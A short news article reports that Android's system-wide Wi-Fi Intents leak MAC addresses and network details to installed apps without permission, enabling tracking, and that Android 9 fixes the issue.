Android leaks sensitive networking information to already installed apps that can be used to track a device. The issue affects all Android devices, except those running the latest version of the operating system, according to security company NightWatch Cybersecurity that discovered the vulnerability.
Google’s operating system uses so-called Intents to allow communication between processes. An app or the OS itself can use Intents to sent system-wide messages that can be received by other apps. This is useful, but also allows malicious apps to intercept messages from other apps. Especially Intents that sent information about the Wi-Fi connection and Wi-Fi network interface are interesting for malicious apps. Android regularly sent them to all apps on a device.
The Intents contain e.g the MAC address of the device, the MAC address of the Wi-Fi router, the Wi-Fi network name, the local IP range, IP address of the gateway and the DNS server address.
Apps can also retrieve the information from the Android WiFiManager but this requires a specific permission during installation the app. Since Android 6.0, it’s also no longer possible to retrieve the MAC address of the device through an API. But an app on the device that listens for Intents in the operating system can also listen for that data without a permission.
Because the MAC address is device specific, it can be used to track an Android device, even when randomizing the MAC address is enabled. And the network name and MAC address of the router can be used to determine the location of the user, according to NightWatch Cybersecurity.
Google was informed about the issue on the 28th of March and fixed the issue this month with the launch of Android 9. Only on this Android version the issue is resolved. Older Android don’t receive an update because a large API is required that could have a negative impact. Users are therefore advised to upgrade to Android 9.0 as soon as possible.